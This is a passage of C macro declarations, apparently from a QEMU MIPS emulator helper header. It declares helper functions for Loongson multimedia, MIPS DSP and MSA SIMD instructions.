TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddsb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddusb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubush, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubsb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubusb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psubb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pshufh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(packsswh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(packsshb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(packushb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpcklhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpckhhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpcklbh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpckhbh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpcklwd, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(punpckhwd, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pavgh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pavgb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmaxsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pminsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmaxub, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pminub, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpeqw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpgtw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpeqh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpgth, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpeqb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pcmpgtb, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psllw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psllh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psrlw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psrlh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psraw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(psrah, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmullh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmulhh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmulhuh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pmaddhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(pasubub, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_1(biadd, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(pmovmskb, TCG_CALL_NO_RWG_SE, i64, i64) /*** MIPS DSP ***/ /* DSP Arithmetic Sub-class insns */ DEF_HELPER_FLAGS_3(addq_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addq_s_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(addq_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addq_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(addq_s_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(addq_pw, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addq_s_pw, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(addu_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addu_s_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(adduh_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(adduh_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(addu_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addu_s_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(addqh_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(addqh_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(addqh_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(addqh_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(addu_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addu_s_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(adduh_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(adduh_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(addu_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addu_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(subq_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subq_s_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(subq_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subq_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(subq_s_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(subq_pw, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subq_s_pw, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(subu_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subu_s_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(subuh_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subuh_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(subu_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subu_s_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(subqh_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subqh_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subqh_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subqh_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(subu_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subu_s_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(subuh_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(subuh_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(subu_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(subu_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(addsc, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(addwc, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(modsub, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_1(raddu_w_qb, TCG_CALL_NO_RWG_SE, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_1(raddu_l_ob, TCG_CALL_NO_RWG_SE, tl, tl) #endif DEF_HELPER_FLAGS_2(absq_s_qb, 0, tl, tl, env) DEF_HELPER_FLAGS_2(absq_s_ph, 0, tl, tl, env) DEF_HELPER_FLAGS_2(absq_s_w, 0, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(absq_s_ob, 0, tl, tl, env) DEF_HELPER_FLAGS_2(absq_s_qh, 0, tl, tl, env) DEF_HELPER_FLAGS_2(absq_s_pw, 0, tl, tl, env) #endif DEF_HELPER_FLAGS_2(precr_qb_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(precrq_qb_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(precr_sra_ph_w, TCG_CALL_NO_RWG_SE, tl, i32, tl, tl) DEF_HELPER_FLAGS_3(precr_sra_r_ph_w, TCG_CALL_NO_RWG_SE, tl, i32, tl, tl) DEF_HELPER_FLAGS_2(precrq_ph_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(precrq_rs_ph_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(precr_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(precr_sra_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl, i32) DEF_HELPER_FLAGS_3(precr_sra_r_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl, i32) DEF_HELPER_FLAGS_2(precrq_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(precrq_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(precrq_rs_qh_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl, env) DEF_HELPER_FLAGS_2(precrq_pw_l, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif DEF_HELPER_FLAGS_3(precrqu_s_qb_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(precrqu_s_ob_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl, env) DEF_HELPER_FLAGS_1(preceq_pw_qhl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceq_pw_qhr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceq_pw_qhla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceq_pw_qhra, TCG_CALL_NO_RWG_SE, tl, tl) #endif DEF_HELPER_FLAGS_1(precequ_ph_qbl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_ph_qbr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_ph_qbla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_ph_qbra, TCG_CALL_NO_RWG_SE, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_1(precequ_qh_obl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_qh_obr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_qh_obla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(precequ_qh_obra, TCG_CALL_NO_RWG_SE, tl, tl) #endif DEF_HELPER_FLAGS_1(preceu_ph_qbl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_ph_qbr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_ph_qbla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_ph_qbra, TCG_CALL_NO_RWG_SE, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_1(preceu_qh_obl, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_qh_obr, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_qh_obla, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_1(preceu_qh_obra, TCG_CALL_NO_RWG_SE, tl, tl) #endif /* DSP GPR-Based Shift Sub-class insns */ DEF_HELPER_FLAGS_3(shll_qb, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(shll_ob, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(shll_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(shll_s_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(shll_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(shll_s_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(shll_s_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(shll_pw, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(shll_s_pw, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_2(shrl_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shrl_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(shrl_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shrl_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif DEF_HELPER_FLAGS_2(shra_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(shra_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif DEF_HELPER_FLAGS_2(shra_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(shra_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_qh, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(shra_r_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif /* DSP Multiply Sub-class insns */ DEF_HELPER_FLAGS_3(muleu_s_ph_qbl, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(muleu_s_ph_qbr, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(muleu_s_qh_obl, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(muleu_s_qh_obr, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(mulq_rs_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(mulq_rs_qh, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(muleq_s_w_phl, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(muleq_s_w_phr, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(muleq_s_pw_qhl, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(muleq_s_pw_qhr, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_4(dpau_h_qbl, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpau_h_qbr, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpau_h_obl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dpau_h_obr, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpsu_h_qbl, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpsu_h_qbr, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpsu_h_obl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dpsu_h_obr, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpa_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpa_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpax_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpaq_s_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpaq_s_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpaqx_s_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpaqx_sa_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dps_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dps_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpsx_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpsq_s_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpsq_s_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpsqx_s_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(dpsqx_sa_w_ph, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(mulsaq_s_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(mulsaq_s_w_qh, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpaq_sa_l_w, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpaq_sa_l_pw, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(dpsq_sa_l_w, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(dpsq_sa_l_pw, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(mulsaq_s_l_pw, 0, void, tl, tl, i32, env) #endif DEF_HELPER_FLAGS_4(maq_s_w_phl, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(maq_s_w_phr, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(maq_sa_w_phl, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_4(maq_sa_w_phr, 0, void, i32, tl, tl, env) DEF_HELPER_FLAGS_3(mul_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(mul_s_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(mulq_s_ph, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(mulq_s_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(mulq_rs_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_4(mulsa_w_ph, 0, void, i32, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_4(maq_s_w_qhll, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_w_qhlr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_w_qhrl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_w_qhrr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_sa_w_qhll, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_sa_w_qhlr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_sa_w_qhrl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_sa_w_qhrr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_l_pwl, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(maq_s_l_pwr, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dmadd, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dmaddu, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dmsub, 0, void, tl, tl, i32, env) DEF_HELPER_FLAGS_4(dmsubu, 0, void, tl, tl, i32, env) #endif /* DSP Bit/Manipulation Sub-class insns */ DEF_HELPER_FLAGS_1(bitrev, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_3(insv, 0, tl, env, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dinsv, 0, tl, env, tl, tl) #endif /* DSP Compare-Pick Sub-class insns */ DEF_HELPER_FLAGS_3(cmpu_eq_qb, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpu_lt_qb, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpu_le_qb, 0, void, tl, tl, env) DEF_HELPER_FLAGS_2(cmpgu_eq_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(cmpgu_lt_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(cmpgu_le_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(cmp_eq_ph, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_lt_ph, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_le_ph, 0, void, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(cmpu_eq_ob, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpu_lt_ob, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpu_le_ob, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmpgdu_eq_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(cmpgdu_lt_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(cmpgdu_le_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_2(cmpgu_eq_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(cmpgu_lt_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(cmpgu_le_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_3(cmp_eq_qh, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_lt_qh, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_le_qh, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_eq_pw, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_lt_pw, 0, void, tl, tl, env) DEF_HELPER_FLAGS_3(cmp_le_pw, 0, void, tl, tl, env) #endif DEF_HELPER_FLAGS_3(pick_qb, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(pick_ph, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(pick_ob, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(pick_qh, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(pick_pw, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_2(packrl_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_2(packrl_pw, TCG_CALL_NO_RWG_SE, tl, tl, tl) #endif /* DSP Accumulator and DSPControl Access Sub-class insns */ DEF_HELPER_FLAGS_3(extr_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(extr_r_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(extr_rs_w, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dextr_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_r_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_rs_w, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_l, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_r_l, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextr_rs_l, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(extr_s_h, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dextr_s_h, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(extp, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(extpdp, 0, tl, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dextp, 0, tl, tl, tl, env) DEF_HELPER_FLAGS_3(dextpdp, 0, tl, tl, tl, env) #endif DEF_HELPER_FLAGS_3(shilo, 0, void, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dshilo, 0, void, tl, tl, env) #endif DEF_HELPER_FLAGS_3(mthlip, 0, void, tl, tl, env) #if defined(TARGET_MIPS64) DEF_HELPER_FLAGS_3(dmthlip, 0, void, tl, tl, env) #endif DEF_HELPER_FLAGS_3(wrdsp, 0, void, tl, tl, env) DEF_HELPER_FLAGS_2(rddsp, 0, tl, tl, env) /* MIPS SIMD Architecture */ DEF_HELPER_3(msa_nloc_b, void, env, i32, i32) DEF_HELPER_3(msa_nloc_h, void, env, i32, i32) DEF_HELPER_3(msa_nloc_w, void, env, i32, i32) DEF_HELPER_3(msa_nloc_d, void, env, i32, i32) DEF_HELPER_3(msa_nlzc_b, void, env, i32, i32) DEF_HELPER_3(msa_nlzc_h, void, env, i32, i32) DEF_HELPER_3(msa_nlzc_w, void, env, i32, i32) DEF_HELPER_3(msa_nlzc_d, void, env, i32, i32) DEF_HELPER_3(msa_pcnt_b, void, env, i32, i32) DEF_HELPER_3(msa_pcnt_h, void, env, i32, i32) DEF_HELPER_3(msa_pcnt_w, void, env, i32, i32) DEF_HELPER_3(msa_pcnt_d, void, env, i32, i32) DEF_HELPER_4(msa_binsl_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsl_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsl_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsl_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsr_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsr_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsr_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_binsr_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_bmnz_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_bmz_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_bsel_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_bclr_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bclr_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_bclr_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_bclr_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_bneg_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bneg_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_bneg_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_bneg_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_bset_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bset_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_bset_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_bset_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_add_a_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_add_a_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_add_a_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_add_a_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_a_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_a_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_a_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_a_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_s_h, void, env, i32, 